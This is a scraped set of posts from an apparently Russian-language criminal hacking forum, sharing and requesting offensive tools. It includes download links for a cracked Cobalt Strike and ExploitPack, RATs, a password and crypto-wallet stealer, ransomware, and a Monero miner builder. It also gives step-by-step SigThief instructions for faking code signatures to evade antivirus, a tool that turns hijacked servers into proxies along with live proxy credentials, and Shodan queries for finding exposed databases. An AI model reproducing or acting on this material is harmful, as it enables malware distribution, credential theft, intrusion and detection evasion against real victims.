║┌─────────────────────────────────────────────────────────────────────────────────┐║
║│ ┌───────────────────────────────────────────────────────────┐ │║
║│ │ ███ █ █ █ █ │ │║
║│ │ █ ███ █ │ │║
║│ │ █ █ █ █ █ │ │║
║│───────────┴───────────────────────────────────────────────────────────┴─────────│║
║│ │║
║│ │║
║│..................................[ CRTeam ].....................................│║
║│ │║
║└─────────────────────────────────────────────────────────────────────────────────┘║
╚═══════════════════════════════════════════════════════════════════════════════════╝
SMS Machine — мощный и функциональный СМС бомбер
E-Mail Machine — бомбер на электронные почты
Abaddon — универсальный парсер для различных задач
AccurateBase — утилита для обработки баз
Bloodhound — поиск информации по никнейму
Wish Checker — чекер аккаунтов Wish
Valorant Checker — чекер аккаунтов Valorant
Uplay Checker — чекер аккаунтов Uplay
Origin Checker — чекер аккаунтов Origin
Spoiler: img
Spoiler: VT's
](https://www.virustotal.com/gui/file/8d0fb31a90626c40f1ffcb8f43ceca61ad68dc0aecde74209bf2b5ddc8f5a40e/details)
VirusTotal
www.virustotal.com
](https://www.virustotal.com/gui/file/e49d072f7c6f476ff8a7f63c153d34343ba8730f229de6306d7a788ed21720b7/detection)
VirusTotal
www.virustotal.com
](https://www.virustotal.com/gui/file/627d23aba4d6b8d4d153f41101e39dcd73d6d7d598aaa13e6c957c2e9cef2b57/detection)
VirusTotal
www.virustotal.com
](https://www.virustotal.com/gui/file/3162acfcc99c78071b2e5096d2b6cd8d92d2e1a5c858c6cdb2c6d84778ac356b/detection)
VirusTotal
www.virustotal.com
](https://www.virustotal.com/gui/file/da222fda7ead987918f161ca13f9dfa65aace6c1080be29ba17a31c3953e5f31/detection)
VirusTotal
www.virustotal.com
](https://www.virustotal.com/gui/file/9fb67160dfef35384c7f6b857e99f3cffe7fc497a5da8b34ca893cd0c1fcf068/detection)
VirusTotal
www.virustotal.com
](https://www.virustotal.com/gui/file/6ff15003b1aae1b62cd7c6eefc80eedaa0c3ff2f1c33b0c24b9438f54fef0e8c/detection)
VirusTotal
www.virustotal.com
](https://www.virustotal.com/gui/file/42b3c045fa85ab516b7a7a6172ab2dcda459d2aad6a05da820722a2fdf25a5e9/detection)
VirusTotal
www.virustotal.com
](https://www.virustotal.com/gui/file/210f4802c67b38c03f8a9da3c65f23e3db3a0014179022590a8875fc747c7e99/detection)
VirusTotal
www.virustotal.com
](https://www.virustotal.com/gui/file/36f417d061b246029783d4c164b88366ec3957c0cddbf6d56b91c5427c28aaec/detection)
VirusTotal
www.virustotal.com
](https://www.virustotal.com/gui/file/23cca82663f53260368ed33355b9551448a373e28738ed93695cac110c13c968/detection)
VirusTotal
www.virustotal.com
Spoiler: DW
Hidden content for authorized users.
![yadi.sk](/proxy.php?image=https%3A%2F%2Fyastatic.net%2Fs3%2Fpsf%2Fdisk- public%2F_%2F3DH63Jsqer9gW4U0rqWJpym3Kpn.png&hash=fbeaef9f3430e7881d21206063ef5523&return_error=1)
Посмотреть и скачать с Яндекс Диска
![yadi.sk](/proxy.php?image=https%3A%2F%2Fyastatic.net%2Fs3%2Fpsf%2Fdisk- public%2F_%2F5hb_sU044zVfPgNsMKf8pNs2_6H.png&hash=7a8adcf3b9b4977c20c8df73c9c222b3&return_error=1) yadi.sk
подскажите кто продает или аренда , какие варианты на рынке. ПМ
Приветствую, дорогие друзья. Хое л спросить, не встречали ли вы софт который из массива почт умеет отделять корпоративные почты? Почты строго зарубеж и ручной перебор практически бесконечен. Написать софт то недолго, но займёт опять же время на подбор доменных имён для опознания... Ну вы поняли). Буду благодарен за подсказку!
Ищу сабж. Есть у кого то ломаный? Или сходные решения для брута VNC
![](/proxy.php?image=https%3A%2F%2Fim0-tub-
ru.yandex.net%2Fi%3Fid%3D3ee3a840bf836a8a49c0e22321042982%26n%3D13&hash=b2cc09175fc0ec5ab60ea1d2230a85ec)
Новая версия популярного фреймфорка
Внутри только файл клиента
Запуск:
Code:Copy to clipboard
java -XX:+AggressiveHeap -XX:+UseParallelGC -jar cobaltstrike.jar
VirusTotal:
https://www.virustotal.com/gui/file...87574b3f2d04e79036b5af65963fe6ba78b/detection
Скачать:
http://www.mediafire.com/file/jkbjd0t7tavdhby/Cobalt_Strike_4.1_client.rar/file
есть термопринтер а софта под него галяк,нужно восстановить чек просто кровь
из носу уже все перепробовал
или если кто сможет отреверсить [Принтчек](http://print-
chek.ru/index.php/software/printchek) был бы очень благодарен))
Прога для проверки почт на валидность?
Подскажите самую хорошую.. хорошо бы с линком..
Code:Copy to clipboard
█████ ███████ ████████
████████ ██████████ ██████████
████ ███ ████ ████ ███ ██ ███
███ ██ ███ ███ ██ ███
███ ███ ███ ███ ████ ████ ███████ ███
███ ███ ███ ███ ████████ ██████ ████████████
███ ███ █████ ███ ███ ███ ███ ███ ████ ███ ████
███ ████████ ███ ███ ███ ███ ███ ███ ███
███ ████████ ███ ████████ █████ ███ ███ ███
████ ██ ████ ████ ███ ██████ ██████ ███ ███ ███
████ ███ ███ ████ ███ ███ ██ ███ ███ ███ ███ ███
█████████ ███ ████ ███ ████ ██ ███ ███ ███ ███ ███
███████ ███ ████ ████ ████████ ███████ ███ ███ ███
█████ ████ ████ ████ █████ ██████ ███ ████ ████
Proudly Presents
╓═══════════════════════════════════════════════════════════════════════════════════╖
║ ...:ExploitPack 12:... ║
║┌═════════════════════════════════─══╤════╤══─════════════════════════════════════┐║
║│ │░▒▓░│ │║
║│ Cracked by..................hlop │░▒▓░│ Release type.................Patch │║
║│ Supplied by.................hlop │░▒▓░│ Protector.....................None │║
║│ Tested by......................- │░▒▓░│ Time for crack...............04:21 │║
║│ Packaged by.................hlop │░▒▓░│ Src language..................Java │║
║│ Release date..........13-09-2019 │░▒▓░│ Price.........................600$ │║
║│ Release size................2871 │░▒▓░│ Version.......................12.6 │║
║│ │░▒▓░│ │║
║╞═════════════════════════════════─══╧════╧══─════════════════════════════════════╡║
║│ ┌──────────────────────┐ │║
║│───────────────────────────├─── INSTALLATION ───┤──────────────────────────────│║
║│ └──────────────────────┘ │║
║│ │║
║│ Запустить ExploitPack_12_crack.jar │║
║│ │║
║╞═════════════════════════════════════════════════════════════════════════════════╡║
║│ │║
║│─[DESCRIPTION]───────────────────────────────────────────────────────────────────│║
║│ │║
║│ Вырезана проверка на лицензию │║
║│ 38.000+ эксплойтов и Zero days в комплекте │║
║│ │║
║│ │║
╠═══════════════════════════════════════════════════════════════════════════════════╣
║┌─────────────────────────────────────────────────────────────────────────────────┐║
║│ ┌───────────────────────────────────────────────────────────┐ │║
║│ │ ███ █ █ █ █ │ │║
║│ │ █ ███ █ │ │║
║│ │ █ █ █ █ █ │ │║
║│───────────┴───────────────────────────────────────────────────────────┴─────────│║
║│ │║
║│ │║
║│................................[ crteam.ml ]....................................│║
║│ │║
║└─────────────────────────────────────────────────────────────────────────────────┘║
╚═══════════════════════════════════════════════════════════════════════════════════╝
Особенности
Raccoon - это инструмент, предназначенный для разведки и сбора информации
с упором на простоту.
Он будет делать все от сбора записей DNS, получения информации WHOIS,
получения TLS-данных, обнаружения присутствия WAF и до перераспределения dir-
перебоев и подсчета поддоменов. Каждое сканирование выводится в
соответствующий файл.
Поскольку большинство сканирований Raccoon являются независимыми и не зависят
от результатов друг друга, он использует асинхронную систему Python для
асинхронного запуска большинства сканирований.
Raccoon поддерживает Tor / proxy для анонимной маршрутизации. Он использует
текстовые списки по умолчанию (для поиска URL-адресов и обнаружения
поддоменов) из удивительного репозитория
SecLists, но в качестве
аргументов могут передаваться различные списки.
Установка
Для последней стабильной версии:
Code:Copy to clipboard
pip install raccoon-scanner
# To run:
raccoon [OPTIONS]
Обратите внимание, что Raccoon требует Python3.5 +, поэтому может
потребоваться использование pip3 install raccoon-scanner.
Вы также можете клонировать репозиторий GitHub для последних функций и
изменений:
Code:Copy to clipboard
git clone https://github.com/evyatarmeged/Raccoon.git
cd Raccoon
python raccoon_src/main.py
Предпосылки
Raccoon использует Nmap для сканирования
портов, а также использует некоторые другие сценарии и функции Nmap. Это
необходимо, чтобы вы установили его перед запуском Raccoon.
OpenSSL также используется для
сканирования TLS / SSL и также должен быть установлен.
Spoiler: Применение
Usage: raccoon [OPTIONS]
Options:
--version Show the version and exit.
-t, --target TEXT Target to scan [required]
-d, --dns-records TEXT Comma separated DNS records to query.Defaults to: A,MX,NS,CNAME,SOA,TXT
--tor-routing Route HTTP traffic through Tor (uses port 9050). Slows total runtime significantly
--proxy-list TEXT Path to proxy list file that would be used for routing HTTP traffic. A proxy from the list will be chosen at random for each request. Slows total runtime
-c, --cookies TEXT Comma separated cookies to add to the requests. Should be in the form of key:value Example: PHPSESSID:12345,isMobile:false
--proxy TEXT Proxy address to route HTTP traffic through.Slows total runtime
-w, --wordlist TEXT Path to wordlist that would be used for URL fuzzing
-T, --threads INTEGER Number of threads to use for URL Fuzzing/Subdomain enumeration. Default: 25
--ignored-response-codes TEXT Comma separated list of HTTP status code to ignore for fuzzing. Defaults to: 302,400,401,402,403,404,503,504
--subdomain-list TEXT Path to subdomain list file that would be used for enumeration
-sc, --scripts Run Nmap scan with -sC flag
-sv, --services Run Nmap scan with -sV flag
-f, --full-scan Run Nmap scan with both -sV and -sC
-p, --port TEXT Use this port range for Nmap scan instead of the default
-fr, --follow-redirects Follow redirects when fuzzing. Default: False (will not follow redirects)
--tls-port INTEGER Use this port for TLS queries. Default: 443
--skip-health-check Do not test for target host availability
--no-url-fuzzing Do not fuzz URLs
--no-sub-enum Do not bruteforce subdomains
--skip-nmap-scan Do not perform an Nmap scan
-q, --quiet Do not output to stdout
-o, --outdir TEXT Directory destination for scan output
--help Show this message and exit.
You must have at least 10 message(s) to view the content.
Hidden content for authorized users.
](https://anonfile.com/dbyfM3wbn5/100_DDOS_SCRIPTS_rar)
anonfile.com
Простой винлокер, но Добавления в автозагрузку нету.
(фото пример, и не является данный винлокер)
Создатель RAT, утверждает, что целью создания RAT была исключительно оптимизация и улучшение выполняемой работы для RAT. Автор подчеркивает, что главная проблема с большей частью RAT в том, что они не используют шифрование и запрашивают включение переадресации порта на устройстве жертвы для контроля зараженных хостов. Разработчик предлагает его собственный инструмент, под названием RATAtack, который использует протокол Telegram для поддержки зашифрованного канала жертвы и создателя канала, и не требует переадресации портов, так как протокол Telegram предусматривает простой метод связи с целью без предварительной настройки порта.
RAT работает через ботов в Telegram
Перед появлением RATatack, пользователь RAT должен создать бота в Telegram,
взять маркер этого бота и поместить его в конфигурационный файл RAT. После
заражения жертвы RATAttack, все хосты соединяются с каналом бота. Владелец
RATAttack может подключиться к тому же каналу и пользоваться простыми
инструкциями для управления клиентами RATatack в зараженных хостах. В
соответствии с нынешней версией RATAttack, поддерживаются следующие команды:
Код:
/msg_box - Выводит окошко с текстом
/snapshot - Делает снимок с вебкамеры
/ip_info - Выводит IP
/download_file - Скачивает файл
/list_dir - Список файлов в текущей папке
/run_file - Выполняет файл
/capture_pc - Скрин рабочего стола
/keylogs - Кейлогер
/self_destruct - Уничтожает сам себя
Ниже указаны некоторые функции RATAttack, а также находящиеся в доработке:
Функции в разработке:
RATAttack написан на Python 2.7 , но автор обещал версию для Python 3.X.
Мистический «отказ от ответственности» будет держать плохих ребят подальше
Как и большинство «темных» разработчиков, которые создают RAT с двойным
назначением, разработчик назвал свое творение Remote Administration Tool
(Инструмент удаленного администрирования). Даже если часть функций, над
которыми он в данный момент работает, обычно обнаруживается во вредоносных
троянах. Они не являются легальными инструментами удаленного
администрирования, такими как Teamviewer и другие.
Разработчик также не забыл исполнить старый номер, и обязательный «отказ от ответственности» в конце описания RATAttack , надеясь избежать последствий, к которым приведут злоумышленники, используя его код, который находится в свободном доступе для слежки за супругами, взлома компаний, или держать диссидентов под наблюдением.
А вот и установка, вобщем автор сиё чудо кильнул на одном ресурсе все исходники и полностью всё,я же успел всё сохранить:
Код:
[CLIKE]git clone https://github.com/itJunky/RATAttack.git
cd RATAttack
pip install requirements.txt (для тех у кого дебиан или кали)
python RATAttack.py[/CLIKE]
You must have at least 50 reaction(s) to view the content.
pas местный.
[CLIKE]
](https://www.sendspace.com/file/pw0tut)
Send, Receive, Track & Share Your Big Files with SendSpace file sharing!
www.sendspace.com
[/CLIKE]
Нашел у себя в архивах, боту 100 лет уже. А код написан грамотно
Вроде как 2016 год или 2015
Features:
Require:
dl: download [ссылка удалена]
vt scan:
virustotal
password: local or xss.is
Подскажите софт который вытягивает файлы с валидных мыл... со всех папок по
маске...
Видел давно продавали подобное, мож кто юзает
на хакфоре был софт AUHackPanel, для подбора паролей к панели известной
малвари, кто сможет написать такой же и сколько это будет по деньгам?
ps auhack работает нестабильно и в нем вшито куча троянов
Добрый день. Есть задача для коддера, кто может написать софт для брута, различных контор
Подробности в ЛС или в телеге: @Peggstan
[CLIKE]
](https://volafile.org/r/ya5xdqxg)
New Room. A Volafile realtime filesharing room where you can share files with friends, work material with colleagues, listen to music or just chat!
volafile.org
[/CLIKE]
это публично
1
Ищу исходники emotet, можно старых версий, если у кого есть может кто поделиться...
С LeakLooker вы можете найти открытые базы данных MongoDB, CouchDB и Elasticsearch, включая экземпляры Kibana. Скрипт анализирует результаты Shodan, исключая пустые и скомпрометированные базы данных. Все отсортировано и представлено в кликабельном виде.
Вы можете найти скрипт здесь GitHub
Вступление
Мы видели много утечек из разных источников - [корзины
](https://www.upguard.com/breaches/aggregate-iq-part-
one)[Amazon](https://medium.com/secjuice/short-story-about-s3-bucket-python-
script-thousands-of-data-and-australian-government-435e4d2b213e) , Firebase ,
Gitlab , [протокол
](https://www.upguard.com/breaches/rsync-
medical)[Rsync](https://medium.com/@woj_ciech/couple-words-about-rsync-
protocol-based-on-breach-of-2k-emails-from-czech-university-5e1cfafe50a9) и
многое другое. Самая распространенная ошибка, приводящая к утечке, - это
отсутствие базовых знаний в области безопасности, неподготовленных людей и в
некоторых случаях лень. Из-за мелких ошибок вся компания может быть
скомпрометирована, и если мы примем во внимание GDPR, штрафы могут быть
разрушительными.
Поиск в Shodan вручную утомителен, потому что он показывает все, что прослушивает определенный порт - пустую и уже взломанную базу данных. LeakLooker берет результаты и показывает только экземпляры размером более 217 МБ и ускоряет вашу охоту. В некоторых случаях было трудно исключить взломанные базы данных, потому что когда хакер оставил записку с требованием выкупа, данные все еще присутствуют, это относится к Elasticsearch и MongoDB. Среди найденной информации по сценарию было много личной идентификационной информации (PII), медицинских данных, транзакций казино, данных владельцев кредитных карт, информации GPS-отслеживания, архивных данных учетных записей определенных групп в социальных сетях, токенов API, конфиденциальных журналов и документы и многое другое. Чтобы сделать его более интересным, вы можете указать страницу, с которой будут отображаться результаты, облегчая поиск вещей, которые никто не искал раньше.
CouchDB
CouchDB - это документно-ориентированная база
данных NoSQL, использующая JSON и JavaScript в качестве языка запросов. Честно
говоря, я не слышал ни о какой серьезной утечке из CouchDB, однако он содержит
хрупкие данные, как и любой другой тип базы данных. Обычно он использует порт
5984. Кроме того, для ясности вы можете просмотреть CouchDB через интерфейс
администрирования под названием Fauxton.
Скрипт дает вам прямую ссылку на путь _utils, где находится Fauxton. Иногда случается, что это защищено паролем, но все же возможно получить доступ к данным, напрямую запрашивая db, и использовать такие команды, как _all_dbs и _all_docs . После этого документы и вложения могут быть извлечены и затем загружены. Я даже не говорю о возможности подделки данных, потому что в большинстве случаев это позволяет вам писать и удалять всю базу данных.
Пример результатов CouchDB
Полезные команды:
_/ all_dbs
/
/
/
Запрос Shodan:
продукт: CouchDB
MongoDB
MongoDB - это еще одна облачная база данных
NoSQL, которая использует структуру JSON. Много было сказано о утечках из
MongoDB, и я нашел много скомпрометированных БД в дикой природе. Ответ от
открытого MongoDB содержит все коллекции в базе данных и диагностическую или
отладочную информацию. Скрипт ориентирован только на размер, базы данных и
коллекции. Это единственный случай, когда веб-интерфейс недоступен, за
исключением веб-сайта администрирования, который прослушивает порт 28017, что
на тысячи выше стандартного порта MongoDB (27017). Соединение с базой данных
осуществляется командой mongo - host
Пример результатов MongoDB
Полезные команды:
показывать базы данных,
использовать 'db'
показывать коллекции
db.'collection'.stats ()
db.'collection'.findOne ()
db.'collection'.find (). PrettyPrint ()
db.'collection'.find ( )
Запрос Шодана:
продукт: MongoDB
Kibana
Kibanaпозволяет визуализировать
данные из Elasticsearch, в большинстве случаев они используются для
мониторинга устройств и представления их в виде графиков или диаграмм. Однако
Кибана также известна раскрытием конфиденциальных данных, одним из самых
печально известных случаев была компания, выпускающая мобильные шпионские
программы. Невозможно определить, является ли экземпляр открытым или нет, как
в других базах данных, поэтому мне пришлось использовать специальный запрос,
чтобы получить только те экземпляры, к которым можно получить доступ без
аутентификации. Я обнаружил, что есть разница в ответе, когда требуется вход в
систему, а когда нет. Чтобы быть точным, заголовок Content-Length имеет
значение около 68407 байт, когда Kibana возвращает панель входа в систему, и
ровно 217 байт, когда он публично открыт и возвращает панель мониторинга. С
учетом этих знаний запрос Шодана выглядит следующим образом: «kibana content-
length: 217», и поскольку он не имеет фильтра, он не использует ваш кредит
Шодана. Это точный запрос, поэтому у вас будет 100 результатов на странице.
Как уже упоминалось ранее, это кликабельно, и ссылка ведет вас прямо к панели
поиска, где вы можете исследовать содержащиеся данные.
Пример результатов Кибана
Запрос Шодана :
kibana content-length: 217
Elasticsearch
Еще одна облачная база данных, известная своими
печально известными утечками, - Elasticsearch . На
самом деле, согласно Википедии, это поисковая система, которая может быть
развернута в облаке и предоставляет вам веб-интерфейс на порту 9200. Что
интересно, Elasticsearch вообще не имеет аутентификации вообще, и владелец
должен заботиться о том, чтобы не выставлять свой экземпляр без надлежащего
механизма входа в систему , Вот почему это происходит так часто, что это
легкая цель для киберпреступников. Каждый кластер Elasticsearch имеет индексы
или индексы, его можно сравнить с базой данных в типичном MySQL.
Официальная документация объясняет это следующим образом:
MySQL = > Базы данных => Таблицы => Столбцы / строки
Elasticsearch => Индексы => Типы => Документы со свойствами
Скрипт показывает ссылки на ' _cat / indices? V ', который затем представляет все индексы в базе данных, включая их размер. Вы можете получить доступ к каждому индексу с помощью команды ' < indice> / _ search? Size = 50 '
Пример результатов Elasticsearch
Полезные команды:
__cat / node? V
cat / count? V
Шодан запрос:
товар: упругий порт: 9200
Заключение
Сценарий был создан в качестве доказательства концепции, чтобы поделиться
пониманием того, как компании и институты обрабатывают ваши данные. Я уверен,
что у китайских, американских или русских хакеров есть что-то более сложное
для сканирования Интернета и поиска бесплатной информации, которая затем может
быть использована для шпионажа.
Киберпреступники также используют небезопасную базу данных для выкупа компаний. Более того, исследовательские компании, такие как UpGuard, также используют различные открытые базы данных, так почему же независимые кибер- исследователи не могут проверить, что происходит в мире сбора информации? И помните, действуйте ответственно, и если вы что-то видите, сообщите об этом.
[Первоисточник](https://hackernoon.com/leaklooker-find-open-databases-in-a- second-9da4249c8472)
**Hello all of you. Today I would like to share a malware encryption tool
released by ANUBIS TEAM.
I noticed this tool bypassed all antivirus tools until now.
Tool**
****
Link check
**_
Scan your file online with multiple different antiviruses without distributing the results of your scan.
antiscan.me
_**
Liên kết tải
xuống
**NOTE:**After encryption is complete, you should not upload to Virustotal
to avoid further damage.
Есть у кого кряк этого чуда? Буду признателен
Limer Miner v0.3
Слив билдера CPU \ GPU Monero майнера.
Скачать AnonFile (Пароль - lime )
SpyralScanner не работатет, вот
MetaDefender
Исходники проекта
Как брутить дедики на линуксе?
Привет, пользователи форума.
Представляю вам очередную полезную и что главное - БЕСПЛАТНУЮ софтину, от команды кодеров шопа №1 по дедикам - xDedic.
xDedic Socks System - предназначена для превращения дедика в сокс. Сокс
можно установить на дедик *(как службу) или же просто запустить. После чего
вбиваете ип от дедика + порт сокса в браузер, proxifier или другой софт, и
пользуетесь. Соксы поднятые на дедиках живут в 10ки раз дольше соксов
купленных на разных сервисах, к тому же порт сокса будете знать только вы,
т.е. вы будете единственным пользователем сокса. Даже если вашу учетку на
дедике заблокируют, сменят все пароли - сокс может продолжать работать!
За основу мы взяли всемизвестный 3proxy.
Что нужно чтоб софт работал?
- Дедик с прямым ип адресом, админ правами и отустствием фаерволов. ОС дедика
не имеет значения, работает везде, от WinXP до Windows10. Такой дедик можно
купить у нас, в наличии более 3000 дедиков с прямым ип.
Возможности софта:
1. Поднятие сокса и https прокси на указанных портах;
2. Установка сокс сервера как служба (запускается как служба);
3. Простой запуск без устанвки (если отсутствуют админ права но ип прямой);
4. Cоксификация полностью анонимная, http заголовки не передаются, если
чекать на сервисах то будет определять как Elite Proxy;
5. Возможность защитить ваш прокси логином\паролем (для параноиков);
6. Логи соединений \ запросов не ведутся - отключены.
Как запустить?
Скачиваете программу на дед, указываете порты для socks и\или https прокси и
нажимете Run или Install.
Start - только запуск сокса, поднят пока программа запущена!.
Install service - установка как сервис, будет работать даже после
перезагрузки, без входа в учетку на дедике.
Auth - можно задать логин и пароль на сокс.
SocksInfo - информация о соксе, ИП, порт, пароль.
Ecли нужно сменить порт, установить пароль, нажимаем Stop, > Uninstall service, меняем настройки, нажимаем Install service.
Важно! Мы не гарантируем работу сокса на всех дедиках с прямым IP, т.к. существует множество нюансов блокировки траффика, как на самом дедике так и на маршрутизаторе к которому он подключен.
Скачать [ DOWNLOAD
] 1.1
Мб
Пароль на архив : xDedic
Соксы поднятые с помощью нашей софтины
Spoiler
Address: 212.80.31.84:1784
Protocol: SOCKS 5
Authentication: NO
Address: 107.178.112.73:12333
Protocol: SOCKS 5
Authentication: YES
Username: xdedic
Password: socks
Address: 192.154.214.116:23441
Protocol: SOCKS 5
Authentication: NO
Address: 192.154.214.116:288
Protocol: HTTPS
Authentication: NO
Сразу к делу!
Ставим Python , я использовал версию 3.7.3
https://www.python.org/downloads/release/python-373/
**Качаем скрипт для подписиSigThief-
master.zip
**
Пароль на архив: xss.is
Открываем командную строку windows:
win+r и пишем: cmd
Распакуем файл sigthief.py из архив на диск C в корень что бы не
путаться:
Пишем в командной строке:
Code:Copy to clipboard
CD /
После ложим свой троян/стиллер рядом с sigthief.py называем его:
build.exe
Ложим любой exe у которого есть подпись так же рядом с build.exe и
sigthief.py, например exe google chrome
и называем его **key.exe
В командной строке пишем команду:
Code:Copy to clipboard
sigthief.py -i key.exe -t build.exe -o yesbuild.exe
**
Скрипт создаст уже подписанный файл с названием yesbuild.exe
Конечно цифровая подпись будет не действительна, но детекты реально снимает.
Использовать как дополнение после крипта очень да же не плохо!
При запуске пишет
ERROR: Required module not found: Time::HiRes qw(ualarm gettimeofday
tv_interval)
Лазил на форумах и там пишут установить через cpan
install Time::HiRes устанавливает, но все же не работает потом
Как это исправить?
Как все уже знают нет смысла искать что-либо бесплатно, посему интересует
мнение форумчан на тему актуального RATника на сегодня.
Сейчас купил лицуху на полгода remcos, пока все устраивает, однако, может есть
достойные альтернативы ?
Просьба без лишней лирики и соплей. Что бы вы купили ?
Пользуйтесь...
BOMBitUP
nodeCrypt - это Linux Ransomware, написанный на NodeJs, который шифрует
предопределенные файлы.
Этот проект был создан для образовательных целей, вы несете единоличную
ответственность за использование nodeCrypto.
github
Ловите. Думаю для изучение будет интересно.
Скачать
Пароль: xss.is
P.S. Все как валялось так и скидываю Интересные вещи есть поучится можно.
Скройте свой сценарий powershell на виду. Invisi-Shell обходит все функции
безопасности Powershell (регистрация ScriptBlock, регистрация модулей,
транскрипция, AMSI) путем перехвата сборок .Net. Хук выполняется через CLR
Profiler API. Из недостатков то что код работает только на процессах x64 и
протестирован на Powershell V5.1
github
P.S. Не проверяйте своих "зверьков" на вирустотал, пользуйтесь хотя бы
nodistribute.com
Yaazhini - это бесплатный сканер уязвимостей для Android APK и API. Это
удобный инструмент, который вы можете легко сканировать любой APK и API
приложения Android и найти уязвимости. Yaazhini включает сканирование
уязвимостей API, уязвимость APK и раздел отчетов для генерации отчета.
Разработчик
P.S. Так же там есть сканер веб-приложений.
Ищу специалиста для написания банковского чекера. Софт должен по номеру
телефона проверять наличие счёта в банках (их несколько, или же под каждый
банк отдельно). Работа строго через гарант!
Jabber - closer420@thesecure.biz
https://xss.is/threads/27326/
Нужна помощь по этой теме, все настроил сайт работает, не могу пройти
авторизацию по логину и пасу из файла psswrd не входит. В чем может быть
проблема?
За помощь закину 30$
Дорогие друзья все кто ищет ключи к данному антивируснику рекомендую
приобрести их в данном магазине.
Взял там несколько вечных лицензий всё работает даже после обновлений!
Пользуюсь ключами уже больше 6 месяцев всё работает как часы!
Всем советую!
http://malwarebytes.rimzo.ru/
Parasite HTTP RAT + плагины,сам не тестил.
Hidden content for authorized users.
Download: https://qaz.im/load/knattR/6TAiSe
Password: R8S3788dZKaK8Zdss8T5yHKN8Z39dhQYeyHbtGfdffQe
Легкая и быстрая установка панели с новым [HOT] установщиком:
Безопасная авторизация, защита от различных веб-атак:
Подробная статистика в виде графика и все возможных счетчиков:
Максимальная настройка и индивидуализация панели:
Удобный просмотр логов, отображение IP, страны, возможность скачать, удалить,
перенести в папку просмотренных и удалить все логи разом. А главное, в панели
есть сортировки по данным, онлайн поиск и система пользователей (вы можете
добавлять, выдавать логи):
Возможность просмотреть логи не скачивая архив:
Обычный поиск:
Расширенный поиск:
Подробная статистика в виде карты мира:
Онлайн настройка стиллера:
Оповещения о новых логах в телеграм:
**
You must have at least 1 reaction(s) to view the content.
You must have at least 1 reaction(s) to view the content.
**
You must have at least 1 reaction(s) to view the content.
PASS:
XakFor.Net
only for researching) ](https://github.com/Darkabode/zerokit)
Zerokit/GAPZ rootkit (non buildable and only for researching) - Darkabode/zerokit
github.com
Всем привет.
Есть у кого-то свежий (3.11-3.12) триал Cobalt Strike?
Нужен оригинальный, не ломаный.
You must have at least 10 reaction(s) to view the content.
Долго объяснять не буду. Кому надо, те знают применение.
Софт собирает все хорошие результаты (гуды) с чекера AIO за всё время.
Использование: поместить в папку results, запустить.
Ничем не накрыт , смотрите исходники на здоровье.
Потом советую удалить дубли, ибо софт не удаляет их)
Исходник:
You must spend at least 31 day(s) on the forum to view the content.
C#:Copy to clipboard
Console.Title = "(AIOC GOODS GRABBER) By Aldesa. Special for XSS.IS";
var dirs = Directory.GetDirectories(Path.GetDirectoryName(Assembly.GetEntryAssembly().Location));
if (File.Exists("GoodsFromGrabber.txt"))
File.Delete("GoodsFromGrabber.txt");
File.Create("GoodsFromGrabber.txt").Close();
foreach (var dir in dirs)
{
foreach (var filenameZ in Directory.GetFiles(dir, "*.txt"))
{
if (filenameZ.Contains("Good"))
{
File.AppendAllLines("GoodsFromGrabber.txt", File.ReadAllLines(filenameZ));
Console.WriteLine("Found " + filenameZ);
}
}
}
Console.WriteLine("COMPLETE");
Console.ReadLine();
Process.Start("http://xss.is/");
пароль от архива местный
LolzHot - Passwords, cookies, cryptowallets, files, etc stealer
Многофункциональный нерезидентный стиллер.
Функционал:
Стиллер сохраненных паролей, cookies, автозаполнений из браузеров:
• Google Chrome
• Mozilla Firefox
• Internet Explorer
• Microsoft Edge
• YandexBrowser
• Opera
• InternetMailRu
• ComodoDragon
• Amigo
• Bromium
• Chromium
• 360Browser
• Nichrome
• RockMelt
• Vivaldi
• GoBrowser
• Sputnik
• Kometa
• Uran
• QIPSurf
• Epic
• Brave
• CocCoc
• CentBrowser
• 7Star
• ElementsBrowser
• TorBro
• Suhba
• SaferBrowser
• Mustang
• Superbird
• Chedot
• Torch
• Waterfox
• Cyberfox
• Comodo IceDragon
• PaleMoon
(Cookies в формате Netscape, в админке имеется конвертер в JSON)
Стиллер сохраненных паролей из:
Почтовые клиенты
• Outlook
• Thunderbird
FTP клиенты
• Filezilla
• WinSCP
IM-клиенты
• Pidgin
• PSI
• PSI Plus
Стиллер криптокошельков:
Anoncoin, Armory, BBQcoin, Bitcoin Core, Bytecoin, Craftcoin, DashCoin, Devcoin, Digitalcoin, Electrum, Fastcoin, Feathercoin, Florincoin, Franko, Freicoin, GoldCoin, I0coin, Infinitecoin, Ixcoin, Junkcoin, Litecoin, Luckycoin, Megacoin, Mincoin, Monero, MultiBit, Namecoin, NovaCoin, Phoenixcoin, PPCoin, Primecoin, ProtoShares, Quarkcoin, Tagcoin, Terracoin, Worldcoin, Yacoin, Zetacoin
Нажмите, чтобы раскрыть...Click to expand...
Стиллер переписки из Skype
Стиллер куки-файлов Telegram, по которомы можно попасть на аккаунт
Стиллер файлов клиента Steam (ssfn+vdf)
Возможность сделать снимок экрана в процессе работы стиллера (screenshot)
Мощный граббер файлов:
- Возможность указывать стартовые каталоги для поиска
- Фильтр по маске имени файла
- Фильтр по размеру файла
- Обработка подпапок
- Обработка ярлыков
- Исключения
Сбор системной информации:
- Список установленных программ и их версий
- Древовидный список запущенных процессов
- Информация о процессоре, видеокарте, ОЗУ, разрешении экрана, раскладках клавиатуры, таймзоне, имя пользователя, компьютера, версия ОС
Встроенный лоадер:
- После отправки отчета может скачать и запустить указанный файл
Нужный функционал включается/выключается в админке
Админка
- Устанавливается на ваш хостинг
- Имеет различные фильтры в списке отчетов и паролей.
- Возможность скачать отчет с машины, который представляет из себя zip-архив с данным
Дополнительные функции
- Стиллер умеет перезапускаться от имени юзера, если запущен от имени системы
- Самоудаление после отправки отчета (включается в админке)
- Поддержка .bit доменов
- Возможна сборка в dll
Скачать: http://rgho.st/7272DS7KN
Double SSH Tunnel Manager поможет вам:
Создать цепочку которая обеспечит вам высокую анонимность и чистоту ваших
действий в сети.
Функции сетевых подключений:
ВЫ-SSH-internet
ВЫ-Socks5-internet
ВЫ-Tor-SSH-internet
ВЫ-Tor-Socks5-internet
ВЫ-SSH1-SSH2-internet
ВЫ-SSH1-Socks5-internet
Свой собственный прокси сервер:
Функции подхвата трафика (проксирование):
Функции блокировки трафика:
- Proxifier protector (настраивает windows firewall)
DNS:
Tor функции:
![](/proxy.php?image=http%3A%2F%2Fssh- tunnel.in%2Fsshmanager%2Fdsshtm%2Fdsshtm.jpg&hash=ff550ce120968f3cfc780f0f6f083d6d)
